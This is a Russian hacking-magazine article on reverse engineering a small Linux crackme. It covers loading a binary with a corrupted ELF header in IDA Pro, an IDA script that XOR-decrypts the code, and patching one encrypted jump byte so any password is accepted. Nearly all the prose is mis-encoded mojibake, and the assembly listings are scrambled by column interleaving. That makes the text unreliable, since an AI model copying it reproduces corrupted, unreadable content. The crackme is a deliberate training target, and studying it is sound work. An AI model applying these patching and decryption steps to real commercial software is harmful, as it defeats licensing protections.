UNIXOID UNIXOID ///// ISSUE

TEXT ÊÐÈÑ ÊÀÑÏÅÐÑÊÈ ÀÊÀ ÌÛÙÚÕ/ NO EMAIL /

ÊÀÏÈÒÓËßÖÈß ÇÀÙÈÒÍÛÕ ÌÅÕÀÍÈÇÌÎÂ ÎÑÎÁÅÍÍÎÑÒÈ ÍÀÖÈÎÍÀËÜÍÎÃÎ ÄÈÇÀÑÑÅÌÁËÈÐÎÂÀÍÈß ÏÎÄ LINUX

ÄÈÇÀÑÑÅÌÁËÈÐÎÂÀÍÈÅ ÏÎÄ LINUX ÈÌÅÅÒ ÑÂÎÞ ÑÏÅÖÈÔÈÊÓ È ÑÂÎÈ ÒÎÍÊÎÑÒÈ, ÍÅ ÎÑÂßÙÅÍÍÛÅ Â ÄÎÑÒÓÏÍÎÉ ËÈÒÅÐÀÒÓÐÅ È ÎÑÒÀÞÙÈÅÑß ÏÎÄ ÂËÀÑÒÜÞ ÒÜÌÛ. ÌÅÆÄÓ ÒÅÌ, ÇÀÙÈÒÍÛÅ ÌÅÕÀÍÈÇÌÛ ÍÅ ÑÏßÒ, ÑÒÀÍÎÂßÑÜ ÂÑÅ ÑÈËÜÍÅÅ È ÑÈËÜÍÅÅ. ×ÒÎÁÛ ÂÛÈÃÐÀÒÜ Â ÝÒÎÉ ÁÈÒÂÅ, ÍÅÎÁÕÎÄÈÌÎ ÍÅ ÒÎËÜÊÎ ÊÐÅÏÊÎ ÄÅÐÆÀÒÜ ÄÈÇÀÑÑÅÌÁËÅÐ Â ÐÓÊÀÕ, ÍÎ È ÓÌÅÒÜ Ñ ÍÈÌ ÎÁÐÀÙÀÒÜÑß

ÂÂÅÄÅÍÈÅ Ãëàâíîé îñîáåííîñòüþ äèçàññåìáëèðîâàíèÿ ïîä Linux ÿâëÿåòñÿ ïîëíîå îòñóòñòâèå äîñòîéíûõ äèçàññåìáëåðîâ (êðîìå IDA PRO, êîíå÷íî) è äðóãîãî èíñòðóìåíòàðèÿ. Ïîýòîìó äàæå ïðîñòàÿ çàùèòà ìîæåò ïîñòàâèòü õàêåðîâ â òóïèê. Ñåãîäíÿ ìû ïðîäåìîíñòðèðóåì òåõíèêó äèçàññåìáëèðîâàíèÿ ïîä Linux íà ïðèìåðå yanisto's tiny crackme, êîòîðûé ìîæíî ñêà÷àòü ñ õîðîøåãî íåìåöêîãî ñàéòà www.crackmes.de/users/yanisto/tiny_crackme/. Çäåñü ñîáðàíà öåëàÿ êîëëåêöèÿ crackme ðàçíûõ óðîâíåé ñëîæíîñòè, è ïîñòîÿííî ïîÿâëÿþòñÿ íîâûå ñ êðàòêîé èíôîðìàöèåé î íèõ.  ÷àñòíîñòè, îïèñàíèå íàøåãî âûãëÿäèò òàê: Èìååò íåáîëüøîé ðàçìåð (<400 áàéò áàéò-êîäà), íî âñå-òàêè ðåàëèçóåò íåêîòîðûå òðèêè: Elf headers corrupted — ðàçðóøåííûé ELF-çàãîëîâîê; «Ciphered» binary — êðèïòîâàííûé áèíàðíèê CRC checking — ïîäñ÷åò CRC Anti ptrace — àíòè ptrace Anti gdb — àíòè gdb Difficulty: 3 — Getting harder ñëîæíîñòü: 3 — («ñòàíîâèñü ñèëüíåå») Platform: Unix/linux etc. Ïëàòôîðìà: UNIX/Linux Language: Assembler. ßçûê àññåìáëåðà Âîò åãî-òî ìû è áóäåì ïûòàòü!  ïðèíöèïå, ìîæíî íå ìó÷èòüñÿ, à çàãëÿíóòü â îäíî èç ãîòîâûõ ðåøåíèé (ñîëþøåíîâ), ïðåäñòàâëåííûõ íà ñàéòå, íî ýòî íå÷åñòíî è äàæå íåèíòåðåñíî. Êðýêìèñîâ ïîä Linux ñîâñåì íåìíîãî, õîðîøèõ êðýêìèñîâ — åùå ìåíüøå, è êàæäûé ñìàêóåòñÿ, êàê âîáëà ñ ïèâîì, äî ïîñëåäíåãî ðåáðûøêà!

110

ÏÓÑÒÜ ÏÎÑËÅ Ý ÒÎÃÎ ÊÒÎ-Í ÍÈÁÓÄÜ ÑÊÀÆÅ ×ÒÎ ËÈÍÓÕ — Ý Ò, ÒÎ ÕÀÊÅÐÑÊÀß ÎÑÜ! Íàøèì îñíîâíûì èíñòðóìåíòîì áóäåò IDA PRO, îäíàêî ìû åùå ïîêàæåì, êàê âçëîìàòü ïðîãðàììó ñ ïîìîùüþ îáû÷íîãî hex-ðåäàêòîðà òèïà HIEW'à, íî ýòî áóäåò ïîòîì, à ïîêà íàáèðàåì â êîìàíäíîé ñòðîêå: $ ./tiny-crackme

ÈÑÑËÅÄÎÂÀÍÈÅ TINY-CRACKME ÈÇÂÍÅ È ÈÇÍÓÒÐÈ Ñðàçó æå ïîñëå çàïóñêà êðýêìèñà íà ýêðàíå ïîÿâëÿåòñÿ êîðîòêàÿ çàñòàâêà è ñòðîêà «enter password», îæèäàþùàÿ ïàðîëÿ. Ââîäèì ÷òî-íèáóäü íàóãàä è, åñòåñòâåííî, ïîëó÷àåì «Wrong password, sorry». Äàëüøå ãàäàòü áåññìûñëåííî: íàäî ëîìàòü. Çàãðóæàåì ôàéë â ñâîé ëþáèìûé gdb, íî íå òóò-òî áûëî! Îòëàä÷èê ãðÿçíî ðóãàåòñÿ, îòêà-

çûâàÿñü ïðèçíàâàòü tiny-crackme èñïîëíÿåìûì ôàéëîì. ×òî ýòî åùå òàêîå?! Âåäü ìû æå åãî òîëüêî ÷òî çàïóñêàëè, è îí âïîëíå íîðìàëüíî èñïîëíÿëñÿ. Ëàäíî, áåðåì objdump è ðàñ÷åõëÿåì äèçàññåìáëåð, íî... îí òîæå íå ìîæåò ðàñïîçíàòü ôîðìàò ôàéëà è ñ ïîçîðîì óáåãàåò. # gdb tiny-crackme This GDB was configured as "i386linux"..."/home/kpnc/hack/tiny-crackme": not in executable format: File format not recognized # objdump -D tiny-crackme objdump: tiny-crackme: File format not recognized

Ïî÷åìó òàê ïðîèñõîäèò? Äà ïîòîìó, ÷òî ELFçàãîëîâîê èñêàæåí, à øòàòíûå ñðåäñòâà

XÀÊÅÐ 01 /85/ 06


tiny-crackme íå îòëàæèâàåòñÿ gdb è íå äèçàññåìáëèðóåòñÿ objdump'îì

Linux'à òàêèõ øóòîê íå ïîíèìàþò, âîò è îòêàçûâàþòñÿ ðàáîòàòü ñ íèì. Ïóñòü ïîñëå ýòîãî êòî-íèáóäü ñêàæåò, ÷òî ëèíóõ — ýòî õàêåðñêàÿ îñü! Ðàííèå âåðñèè IDA âåëè ñåáÿ òî÷íî òàê æå, íî â ïîñëåäíåå âðåìÿ ELF-çàãðóç÷èê áûë äîðàáîòàí, è òåïåðü ìû ìîæåì äèçàññåìáëèðîâàòü äàæå èçâðàùåííûå ôàéëû. IDA æóòêî ðóãàåòñÿ: the ELF header entry size is invalid (ïîëå ðàçìåðà ELF-çàãîëîâêà íåâåðíî), the SHT entry size is invalid (ïîëå ðàçìåðà çàãîëîâêà òàáëèöû ñåêöèé íåâåðíî); SHT table size or offset is invalid (ðàçìåð çàãîëîâêà òàáëèöû ñåêöèé èëè åå ñìåùåíèå íåâåðíî), file contains meaningless/illegal section declarations, using program sections (ôàéë ñîäåðæèò áåññìûñëåííûå/íåâåðíûå îáúÿâëåíèÿ ñåêöèé, ïîýòîìó áóäóò èñïîëüçîâàòüñÿ ïðîãðàììíûå ñåêöèè, îíè æå ñåãìåíòû), íî âñå-òàêè îòêðûâàåò åãî è äàæå íà÷èíàåò äèçàññåìáëèðîâàòü, ÷òî î÷åíü õîðîøî! Ýêðàí äèçàññåìáëåðà äîëæåí âûãëÿäåòü ïðèáëèçèòåëüíî òàê: LOAD:00200008 start proc near LOAD:00200008 mov bl,2Ah ; çàñëàòü â ðåãèñòð BL çíà÷åíèå 2Ah LOAD:0020000A jmp loc_200040 ; ïðûãíóòü íà loc_200040 ... LOAD:002002F0 sub_2002F0 proc near ; CODE XREF: start:loc_200046p LOAD:002002F0 nop ; ïðîöåäóðà ðàñøèôðîâùèêà LOAD:002002F1 mov eax,offset loc_20004B ; íà÷àëî øèôðîáëîêà LOAD:002002F6 mov esi,eax ; óñòàíàâëèâàåì èñòî÷íèê íà íà÷àëî LOAD:002002F8 mov edi,esi ; óñòàíàâëèâàåì ïðèåìíèê íà íà÷àëî LOAD:002002FA mov ecx,2A5h ; äëèíà øèôðîáëîêà â áàéòàõ LOAD:002002FF shr ecx,2 ; ïåðåâîäèì áàéòû â äâîéíûå ñëîâà LOAD:00200302 LOAD:00200302 loc_200302: ; CODE XREF: sub_2002F0+19j LOAD:00200302 lodsd ; èçâëåêàåò î÷åðåäíîå äâîéíîå ñëîâî LOAD:00200303 xor eax,3F5479F1h ; øèôðóåì åãî LOAD:00200308 stosd ; ïîìåùàåì îáðàòíî LOAD:00200309 loop loc_200302 ; ìîòàåì öèêë ðàñøèôðîâêè LOAD:0020030B retn ; âûõîäèì èç ïðîöåäóðû

Òî÷êà âõîäà (start), ðàñïîëîæåííàÿ ïî àäðåñó 200008h, âûãëÿäèò íåòèïè÷íî è ñðàçó æå ïðèòÿãèâàåò ê ñåáå âíèìàíèå. Íîðìàëüíûå ELF-ôàéëû íà÷èíàþòñÿ ñ àäðåñà 08048000h (ñì. ñòàòüþ «Ñåêðåòû ïîêîðåíèÿ ýëüôîâ»), à ýòîò ðàçëåãñÿ, ïîíèìàåøü, â îáëàñòè ñòåêà è ëåæèò ñåáå. Íó è ïóñêàé ëåæèò! Îí æå íèêîìó íå ìåøàåò! Òàêîé ïðèåì âïîëíå çàêîíåí, è âñå íîðìàëüíî ðàáîòàåò. Îòëàä÷èêîâ ýòî, ïîõîæå, íè÷óòü íå ñìóùàåò, äà è äèçàññåìáëåðîâ òîæå. Ýòî ñîâñåì íå àíòèîòëàäî÷íûé ïðèåì, à ïðîñòî õèòðûé âûêðóòàñ ñîçäàòåëÿ êðýêìèñà. Âûïîëíåíèå ïðîãðàììû íà÷èíàåòñÿ ñ êîìàíäû «mov bl,2A», çàãîíÿþùèé â ðåãèñòð BL çíà÷åíèå 2Ah. Íèãäå ïî õîäó ïðîãðàììû îíî íå èñïîëüçóåòñÿ, òàê ÷òî ýòî ÿâíûé ìóñîð. Èëè âñå-òàêè íåò?  ASCIIïðåäñòàâëåíèè êîìàíäà âûãëÿäèò êàê «?*», è, âîçìîæíî, âíåñåíà óìûøëåíî, íî âîò ðàñøèôðîâàòü åå ñìûñë ìûùúõó òàê è íå óäàëîñü, ïîýòîìó îí ÷åðåç ñåðèþ ïðûæêîâ òèïà jmp loc_200040 -> jmp loc_200046 -> call sub_2002F0 äîáèðàåòñÿ äî çàâåòíîé ïðîöåäóðû sub_2002F0. Ýòî ïðàêòè÷åñêè åäèíñòâåííàÿ ïðîöåäóðà â ïðîãðàììå, à âñå îñòàëüíîå ñîäåðæèìîå, êàê ëåãêî âèäåòü, çàøèôðîâàíî. Ëîãè÷íî ïðåäïîëîæèòü, ÷òî ýòî è åñòü ðàñøèôðîâùèê! Ðàñøèôðîâêà êîäà â äèçàññåìáëåðå âñåãäà ïðåäñòàâëÿëà áîëüøóþ ïðîáëåìó. Äèçàññåìáëåð íå ìîæåò äèçàññåìáëèðîâàòü óïàêîâàííûé/çàøèôðîâàííûé êîä, è åãî íàäî êàê-òî ðàñøèôðîâàòü. À êàê ýòî ñäåëàòü? Îäíè õàêåðû ïðåäïî÷èòàþò ñíèìàòü ñ ðàáîòàþùåé ïðîãðàììû äàìï, äðóãèå — ñîçäàþò ñïåöèàëüíûé ñêðèïò, ðàñøèôðîâûâàþùèé ôàéë ïðÿìî â äèçàññåìáëåðå. Ïåðâûé ïóòü ïðîùå, âòîðîé — íàäåæíåå. Åñëè ïðîãðàììà èñïîëüçóåò ðàçëè÷íûå àíòèîòëàäî÷íûå ïðèåìû, òî îíà ñìîæåò ïîäñóíóòü íàì èñïîð÷åííûé äàìï, åñëè âîîáùå ïîçâîëèò äîòðîíóòüñÿ äî íåãî. Ëó÷øå ðàñøèôðóåì ïðîãðàììó âðó÷íóþ, çàîäíî ïîçíàêîìèâøèñü ñî ñêðèïòàìè IDA Pro, íî äëÿ ýòîãî íàì ïîòðåáóåòñÿ ïðîàíàëèçèðîâàòü àëãîðèòì ðàáîòû ïðîöåäóðû ðàñøèôðîâùèêà. Ýòî ëåãêî! Êîìàíäà «mov eax, offset loc_20004B» â ñòðîêå 002002F1h çàãðóæàåò â ðåãèñòð EAX óêàçàòåëü íà íà÷àëî çàøèôðîâàííîãî áëîêà, à êîìàíäà «mov ecx, 2A5h» çàäàåò êîëè÷åñòâî îáðàáàòûâàåìûõ áàéò, êîòîðîå òóò æå äåëèòñÿ íà ÷åòûðå (ñäâèã íà äâå ïîçèöèè âïðàâî ýêâèâàëåíòåí äåëåíèþ íà ÷åòûðå, òàê êàê 2**2 = 4), ïîñêîëüêó ðàñøèôðîâêà èäåò äâîéíûìè ñëîâàìè. Öèêë ðàñøèôðîâêè ïðåäåëüíî ñòàíäàðòåí è òðèâèàëåí: lodsd/xor eax, 3F5479F1h/stosd/loop (ãðóçèì â EAX î÷åðåäíîå äâîéíîå ñëîâî/äåëàåì åìó XOR/ñîõðàíÿåì ðåçóëüòàò/ìîòàåì öèêë). Êàê ýòî ìîæåò ðàáîòàòü?! Ëþáîé ïðîãðàììèñò çíàåò, ÷òî â Linux'å ñåãìåíò êîäà äîñòóïåí òîëüêî íà èñïîëíåíèå (÷òåíèå), è ëþáàÿ ïîïûòêà çàïèñè ïðèâîäèò ê àâàðèéíîìó çàâåðøåíèþ ïðèëîæåíèÿ. Íà ñàìîì äåëå ýòî îòíþäü íå îãðàíè÷åíèå ñèñòåìû, à âñåãî ëèøü àòðèáóòû êîäîâîãî ñåãìåíòà, íàçíà÷àåìûå ëèíêåðîì ïî óìîë÷àíèþ.  äàííîì ñëó÷àå âûñòàâëåíû âñå òðè àòðèáóòà: ÷òåíèå/çàïèñü/èñïîëíåíèå, î ÷åì èíôîðìèðóåò íàñ IDA â ïåðâîé ñòðîêå (Segment permissions: Read/Write/Execute). Ïðèìè ýòî âî âíèìàíèå ïðè ñîçäàíèè ñîáñòâåííûõ çàùèòíûõ ìåõàíèçìîâ! ×òîáû ðàñøèôðîâàòü ïðîãðàììó, íåîáõîäèìî ïðîêñîðèòü áëîê îò 20004Bh äî (020004Bh+2A5h) êîíñòàíòîé 3F5479F1h. Íàæèìàåì <ShiftF2> è â ïîÿâèâøåìñÿ äèàëîãîâîì îêíå ââîäèì ñëåäóþùèé ñêðèïò: IDA-ñêðèïò, àâòîìàòè÷åñêè ñíèìàþùèé øèôðîâêó // îáúÿâëÿåì ïåðåìåííûå (òèï auto) auto a, x; // ìîòàåì öèêë for (a = 0x20004B; a < (0x20024B+0x2A5);) { // áåðåì î÷åðåäíîå äâîéíîå ñëîâî ïî àäðåñó a x = Dword(a); // ðàñøèôðîâûâàåì åãî x = x ^ 0x3F5479F1; // ïàò÷èì îáðàç çàãðóæåííîãî ôàéëà (íå ñàì ôàéë) PatchDword(a,x); // ìîäèôèöèðóåì ñ÷åò÷èê öèêëà (IDA íå ïîääåðæèâàåò a+=4) a = a + 4;

ïðîöåññ äèçàññåìáëèðîâàíèÿ

XÀÊÅÐ 01 /85/ 06

}

111


UNIXOID ///// ISSUE

ïðîñìîòð àòðèáóòîâ åäèíñòâåííîãî ñåãìåíòà

Åñëè ñêðèïò íàïèñàí áåç îøèáîê, òî íàæàòèå <Ctrl-Enter> ïðèâåäåò ê åãî âûïîëíåíèþ è ðàñøèôðóåò âåñü êîä. Êñòàòè ãîâîðÿ, ñîçäàòåëü êðýêìèñà äîïóñòèë íåêðèòè÷åñêóþ îøèáêó è ðàñøèôðîâàë íà äâà áàéòà áîëüøå ïîëîæåííîãî, â ðåçóëüòàòå ÷åãî óãðîáèë íà÷àëî ðàñøèôðîâùèêà, ê òîìó ìîìåíòó óæå îòðàáîòàâøåå, êàê ïåðâàÿ ñòóïåíü ðàêåòû, è íèêàê íå ïðåïÿòñòâóþùåå íîðìàëüíîìó âûïîëíåíèþ ïðîãðàììû: Ïðîöåäóðà ðàñøèôðîâêè, ïîæèðàþùàÿ ñàìà ñåáÿ LOAD:002002F0 sub_2002F0 proc near ; CODE XREF: start:loc_200046?p LOAD:002002F0

jmp near ptr 202077E1h ; èñïîð÷åííûå êîìàíäû

LOAD:002002F1

in al,dx

Òåïåðü, êîãäà âåñü êîä ðàñøèôðîâàí, ìû ìîæåì ïðîäîëæèòü åãî àíàëèç. Âîçâðàùàåìñÿ ê ìåñòó âûçîâà ïðîöåäóðû ðàñøèôðîâùèêà call sub_2002F0, ðàñïîëîæåííîé ïî àäðåñó 00200046h.

ñòðîêå «loc_2000B9». Ñóôôèêñ «o» â êîíöå îáîçíà÷àåò offset (ñìåùåíèå). Ýòî ãîâîðèò î òîì, ÷òî äàííàÿ ñòðîêà àäðåñóåòñÿ ïî åå ñìåùåíèþ, òî åñòü ìû èìååì äåëî ñ óêàçàòåëåì. Íà ñàìîì äåëå â îêðåñòíîñòÿõ ñòðîêè 2000B9h íåò è íå ìîæåò áûòü íè÷åãî èíòåðåñíîãî. Òîò êîä ïðîñòî âûâîäèò ñîîáùåíèå wrong password íà ýêðàí. Ïðàâîñóäèå óæå ñâåðøèëîñü! Êàðàþùàÿ ðóêà Íåìåçèäû íàõîäèòñÿ ñîâñåì â äðóãîì ìåñòå.  êàêîì? Ìû âèäèì, ÷òî ðÿäîì ñî ñòðîêîé 2000B9h èìååòñÿ åùå îäíà ïåðåêðåñòíàÿ ññûëêà, âåäóùàÿ ê ìåòêå «start+C7j». Ñóôôèêñ «j» ïîäðàçóìåâàåò jump, òî åñòü ïðûæîê. Ýòî óæå èíòåðåñíåå! Âîçìîæíî, çäåñü-òî è êðîåòñÿ òîò ñàìûé çàâåòíûé óñëîâíûé ïåðåõîä, êîòîðûé ðåøàåò, ïðàâèëüíûé ëè ýòîò ïàðîëü èëè íåò. Ïîäâîäèì êóðñîð ê ïåðåêðåñòíîé ññûëêå è íàæèìàåì ENTER, IDA àâòîìàòè÷åñêè ïåðåíîñèò íàñ íà íóæíîå ìåñòî \ê ñòðîêå 2000ÑFh. ×òî æ, âñå âïîëíå ëîãè÷íî, ôóíêöèÿ start ðàñïîëîæåíà ïî àäðåñó 200008h, à 200008h + C7h = 2000ÑFh.

Âíåøíèé âèä äèçàññåìáëåðà ïîñëå ðàñïàêîâêè

Îêðåñòíîñòè êîäà, â êîòîðûé íàñ ïðèâåëà öåïî÷êà ïåðåêðåñòíûõ ññûëîê

LOAD:00200046

call sub_2002F0 ; ïðîöåäóðà ðàñøèôðîâêè

LOAD:002000CC

pop ebx ; CODE XREF: start:loc_200099?j

LOAD:0020004B B8

mov eax,20019Eh ; çàñëàòü â eax ÷èñëî 20019Eh

LOAD:002000CD

test ebx,ebx ; ïðîâåðêà ebx íà ðàâåíñòâî íóëþ

LOAD:0020004C 9E 01

sahf ; áåññìûñëåííûé ìóñîð

LOAD:002000CF

jnz short loc_2000B9 ; ïðûæîê, åñëè ebx íå íóëü

LOAD:0020004E 20

and [eax],al

LOAD:002000D1

mov ecx,offset aSuccssCngrt; âåòêà «ïðàâèëüíîãî ïàðîëÿ»

LOAD:0020004F 00

add [ebx+0F4h],bh

Êîä âûãëÿäèò ïîëíîé áåññìûñëèöåé. Êàêèå òóò åùå sahf, and è add? Íî ýòî åùå ÷òî! Ïðèñìîòðåâøèñü ïîâíèìàòåëüíåå (Options-> Text representation -> Number of opcode bytes -> 4), ìû îáíàðóæèâàåì, ÷òî èíñòðóêöèè MOV EAX,2019Eh ñîîòâåòñòâóåò... îäíîáàéòîâûé êîä B8h (âî âñÿêîì ñëó÷àå, IDA Pro óâåðÿåò íàñ â ýòîì), ÷åãî íå ìîæåò áûòü! Íà ñàìîì äåëå ýòî — áàãîôè÷à ÈÄÛ, íå îáíîâèâøåé äèçàññåìáëåðíûé ëèñòèíã ïîñëå ðàñøèôðîâêè. Ïîäãîíÿåì êóðñîð ê ñòðîêå 20004Bh è íàæèìàåì <U>, ÷òîáû ïåðåâåñòè åãî â íåîïðåäåëåííóþ (undefined) ôîðìó. Òî æå ñàìîå íåîáõîäèìî ïðîäåëàòü è ñ ìàññèâîì áàéò, íà÷èíàþùèìñÿ ñî ñòðîêè 00200053h. Íî ýòî åùå íå âñå! Âåäü ïîñëå ðàñøèôðîâêè ýòîò ìàññèâ ñòàë ÷àñòüþ íàøåé ïðîöåäóðû, à IDA îøèáî÷íî îáîðâàëà ôóíêöèþ íà àäðåñå 200050h, âëåïèâ ñþäà «endp» (end of procedure). ×òîáû âîññòàíîâèòü ñòàòóñ-êâî, íåîáõîäèìî ïîäîãíàòü êóðñîð ê êîíöó ìàññèâà è íàæàòü <E> (Edit->Functions->Set Function End). Ïîñëå ýòîãî ìîæíî âåðíóòüñÿ â íà÷àëî ñòðîêè 20004Bh è íàæàòü «C», ÷òîáû ïðåâðàòèòü íåîïðåäåëåííûå áàéòû â CODE. Ïîñëå ðàñøèôðîâêè ñêðèïòîì íà ýêðàíå äèçàññåìáëåðà ìû ïîëó÷èì ÷èòàáåëüíûé êîä, â êîíöå êîòîðîãî ïðîñìàòðèâàþòñÿ òåêñòîâûå ñòðîêè «Wrong password, sorry» è «Success! Congratulations» ñ ïåðåêðåñòíûìè ññûëêàìè âîçëå íèõ. Ïåðåêðåñòíàÿ ññûëêà — ýòî òî, ÷òî íà÷èíàåòñÿ ñ ïðåôèêñà «XREF» (cross reference). Ýòî ìîùíîå îðóæèå ïðîòèâ çàùèòû, âåäóùåå ïðÿìî â ñåðäöå çàùèòíîãî ìåõàíèçìà.  ÷àñòíîñòè, ÷òîáû óâèäåòü, êàêîé êîä âûâîäèò ñîîáùåíèå î íåïðàâèëüíîì ïàðîëå, äîñòàòî÷íî ïåðåéòè ïî ïåðåêðåñòíîé ññûëêå ê

ïîñëåäíÿÿ ïðîâåðêà ñêðèïòà ïåðåä ïåðåäà÷åé íà âûïîëíåíèå

112

Äåðæèòå ìîé ìûùúõ'èíûé õâîñò! Ïî ýòîìó àäðåñó äåéñòâèòåëüíî íàõîäèòñÿ óñëîâíûé ïåðåõîä, ñðàâíèâàþùèé ñîäåðæèìîå ðåãèñòðà EBX ñ íóëåì, è åñëè îí íå ðàâåí íóëþ, òî ïðîèñõîäèò ïåðåõîä íà ïîäïðîãðàììó, âûâîäÿùóþ ñîîáùåíèå wrong password íà ýêðàí.  ïðîòèâíîì ñëó÷àå óïðàâëåíèå ïîëó÷àåò âåòêà, âûâîäÿùàÿ «Success! Congratulations». À ÷òî åñëè ïîïðîáîâàòü çàìåíèòü JNZ íà JZ? Òîãäà ïðîãðàììà ïîåäåò êðûøåé. Ïðàâèëüíûé ïàðîëü, êîòîðîãî ìû âñå ðàâíî íå çíàåì, îíà áóäåò âîñïðèíèìàòü êàê íåïðàâèëüíûé, ïîñûëàÿ åãî îáðàòíî, à íåïðàâèëüíûå ïàðîëè âñòðåòèò ñ äîðîãîé äóøîé. Âñÿ ïðîáëåìà â òîì, ÷òî ïðîãðàììà çàøèôðîâàíà, è ïðåæäå ÷åì ïàò÷èòü áàéòû, åå íåîáõîäèìî ðàñøèôðîâàòü.  ïðèíöèïå, ýòî ìîæíî ñäåëàòü è ñ ïîìîùüþ IDA Pro, íî ïðîùå áóäåò âîñïîëüçîâàòüñÿ êîììåð÷åñêèì HIEW'îì èëè áåñïëàòíûì ðåäàêòîðîì HTE, êîòîðûé ìîæíî ñêà÷àòü ñ www.sourceforge.net/projects/hte. Îñòàíîâèì ñâîé âûáîð íà ïîñëåäíåì, õîòÿ îí, â îòëè÷èå îò HIEW'à, íå ìîæåò ðåäàêòèðîâàòü ELF'û ñ èñêàæåííûì çàãîëîâêîì â ðåæèìå image (òî åñòü âñå âèðòóàëüíûå àäðåñà ìû äîëæíû âû÷èñëÿòü ñàìîñòîÿòåëüíî), íî çàòî íàì íå ïðèäåòñÿ ïëàòèòü. Çàãðóæàåì ôàéë â ðåäàêòîð (hte tiny-crackme), íàæèìàåì <F6> (mode) èëè äàâèì ïðîáåë, â ïîÿâèâøåìñÿ äèàëîãîâîì îêíå âûáèðàåì elf/program header (ïðîñìîòð ïðîãðàììíîãî çàãîëîâêà, îïèñûâàþùåãî ñåãìåíòû) è âèäèì îäèí-åäèíñòâåííûé ñåãìåíò entry 0 (load). Íàæèìàåì <Enter>, ÷òîáû ïðîñìîòðåòü åãî àòðèáóòû, è âèäèì, ÷òî îí íà÷èíàåòñÿ ñ âèðòóàëüíîãî àäðåñà 200000h, ðàñïîëîæåííîãî â ôàéëå ïî ñìåùåíèþ 0h. Ñëåäîâàòåëüíî, âèðòóàëüíûé àäðåñ 2000Ñfh, ïî êîòîðîìó ðàñïîëîæåí íàø çëîïîëó÷íûé óñëîâíûé ïåðåõîä, ñîîòâåòñòâóåò ñìåùåíèþ 0ÑFh. Ïåðåõîäèì ñþäà (<F5>, 0CFh, <Enter>) è âèäèì, ÷òî çäåñü íàõîäèòñÿ áàéò 84h. Ñåé÷àñ ìû äîëæíû ðàñøèôðîâàòü åãî, èñïðàâèòü è çàøèôðîâàòü îïÿòü. Êàê ýòî ñäåëàòü? Âîîáùå-òî, åñòü ìíîãî ïóòåé, è âñå îíè ïðàâèëüíûå. Ñàìîå ïðîñòîå — íàëîæèòü XOR. Âåäü êëþ÷ øèôðîâàíèÿ íàì èçâåñòåí — 3F5479F1h. Íî âîò â ÷åì âîïðîñ: êàêàÿ èìåííî ÷àñòü êëþ÷à íàêëàäûâàåòñÿ íà äàííûé áàéò?Òî åñòü êàêèì èç ÷åòûðåõ áàéòîâ øèôðîâàòü? Ýòî íåòðóäíî âûÿñíèòü ìàòåìàòè÷åñêè. Íà÷àëî øèôðîáëîêà ðàñïîëàãàåòñÿ ïî àäðåñó 200004Bh, òàê? Òîãäà íàø áàéò ñîâïàäàåò ñ 2000CFh — 20004Bh % 4 áàéòîì êëþ÷à. ×òîáû âû÷èñëèòü çíà÷åíèå ýòîãî âûðàæåíèÿ, â HTE äîñòàòî÷íî âîéòè â Edit>Evaluate è ââåñòè åãî â êàëüêóëÿòîð. Ïîëó÷èòñÿ íîëü. Çíà÷èò, áàéò 2000ÑFh øèôðóåòñÿ ïåðâûì áàéòîì êëþ÷à. Íà x86 ïëàòôîðìå îí ðàñïîëàãàåòñÿ ïî ìåíüøåìó àäðåñó, òî åñòü â ìëàäøèõ ðàçðÿäàõ ÷èñëà, è â äàííîì ñëó÷àå ðàâåí F1h. Íå âûõîäÿ èç êàëüêóëÿòîðà, äàåì 84h ^ F1h è ïîëó÷àåì 75h, ÷òî â òî÷íîñòè ñîîòâåòñòâóåò îïêîäó

XÀÊÅÐ 01 /85/ 06


Ä LINUX, ÒÎÉ CRACKME ÏÎÄ ËÅÊÎ ÍÅ ÑÀÌÛÉ ÏÐÎÑÒ ÓËÈ ÄÀË ÂÎÒ ÌÛ È ÕÀÊÍÓ ËÎÌÀ.. ÂÇË ÒÐÈÐÎÂÀ ÁÀÇÎÂÎÞ ÒÅÕÍÈÊÓ ÄÅÌÎÍÑÒ ÏÐÎÄ èíñòðóêöèè JNZ. Êàê ñëåäóåò èç ðóêîâîäñòâà Intel, èíñòðóêöèè JZ ñîîòâåòñòâóåò îïêîä 74h. Íàáèðàåì â êàëüêóëÿòîðå 74h ^ F1h è ïîëó÷àåì 85h. Ýòî è áóäåò çàøèôðîâàííîå çíà÷åíèå îïêîäà JZ. Íàæèìàåì <F4> äëÿ àêòèâàöèè ðåæèìà ðåäàêòèðîâàíèÿ, çàïèñûâàåì íà ìåñòî 84h çíà÷åíèå 85h è íàæèìàåì <F2>, ÷òîáû ñîõðàíèòü ïðàâêó íà äèñê. Êàê âèäíî, ïîñëå õàêà èçìåíèëñÿ âñåãî îäèí áèò è ýòèì áèòîì îêàçàëñÿ ìëàäøèé áèò ÷èñëà: 85h (10000101) --> 84h (10000100). Ýòî ïîòîìó, ÷òî ñàìè îïêîäû 74h (1110100) è 75h (1110101) ðàçëè÷àþòñÿ âñåãî ëèøü ìëàäøèì áèòîì, à XOR — ýòî áèòîâàÿ îïåðàöèÿ! Äðóãèìè ñëîâàìè, åñëè øèôðîâàíèå ïðîèçâîäèòñÿ ïóòåì íàëîæåíèÿ XOR, òî ÷òîáû ïðåâðàòèòü JZ â JNZ (èëè íàîáîðîò), íåçàâèñèìî îò êëþ÷à øèôðîâàíèÿ, äîñòàòî÷íî èíâåðòèðîâàòü ìëàäøèé áèò øèôðîòåêñòà! È íå íóæíî âîçèòüñÿ ñî âñåìè ýòèìè ðàñ÷åòàìè! Âîçüìè ñåáå ýòîò òðþê íà çàìåòêó. Íàì îí åùå ïðèãîäèòñÿ. Âûõîäèì èç ðåäàêòîðà è ñ çàìèðàíèåì ñåðäöà çàïóñêàåì timy-crackme. Óâû! Îí íå çàïóñêàåòñÿ! Òî åñòü çàïóñêàåòñÿ, êîíå÷íî, íî îòêàçûâàåòñÿ ïðèíèìàòü ïàðîëü. Ïî÷åìó? Âîçâðàùàåìñÿ ê ñòðîêå 002000CFh (òîé ñàìîé, â êîòîðîé ìû èñïðàâèëè óñëîâíûé ïåðåõîä) è ïðîêðó÷èâàåì ýêðàí äèçàññåìáëåðà ââåðõ äî òåõ ïîð, ïîêà íå âñòðåòèì ñëåäóþùóþ ïåðåêðåñòíóþ ññûëêó start+AFj, âåäóùóþ ê ñòðîêå 2000ACh. Ïîñìîòðèì, ÷òî ó íàñ òàì? Ìèíà ñ äåòîíàòîðîì LOAD:002000AC

call loc_2002C9 ; ïðîâåðêà ïàðîëÿ è ñâîåãî CRC

LOAD:002000B1

xor ebx,dword_200296 ; àíàëèç ðåçóëüòàòîâ

LOAD:002000B7

jz short loc_2000CC ; âñå îê

